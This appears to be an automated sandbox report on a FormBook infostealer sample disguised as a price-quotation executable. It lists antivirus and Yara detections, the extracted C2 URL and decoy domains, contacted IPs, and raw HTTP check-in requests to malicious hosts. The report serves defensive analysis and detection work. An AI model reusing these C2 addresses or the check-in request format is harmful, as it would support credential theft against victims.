Malware Configuration Extractor: FormBook {"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}

Multi AV Scanner detection for submitted file

Show sources

Source: PRICE_REQUEST_QUOTATION.exe	Virustotal: Detection: 34%			Perma Link
Source: PRICE_REQUEST_QUOTATION.exe	ReversingLabs: Detection: 28%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll

ReversingLabs: Detection: 13%

Machine Learning detection for sample

Show sources

Source: PRICE_REQUEST_QUOTATION.exe

Joe Sandbox ML: detected

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.wscript.exe.c28870.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.wscript.exe.516796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source:	Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00405EC2 FindFirstFileA,FindClose,	0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 0_2_00402671 FindFirstFileA,	0_2_00402671

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.139 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe	Network Connect: 109.106.246.165 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe	Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe	Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.patrickandmaxine.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.nudesalon.digital/rgoe/

Source: Joe Sandbox View

ASN Name: CNSERVERSUS CNSERVERSUS

Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: PRICE_REQUEST_QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PRICE_REQUEST_QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	String found in binary or memory: http://survey-smiles.com
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	String found in binary or memory: https://bitninja.io

Source: unknown

DNS traffic detected: queries for: www.appleluis.host

Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.patrickandmaxine.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.nailsestetic.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.futurodr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1Host: www.babeshotnud.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000002.273624416.000000000069A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FF1

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: PRICE_REQUEST_QUOTATION.exe

Source: PRICE_REQUEST_QUOTATION.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
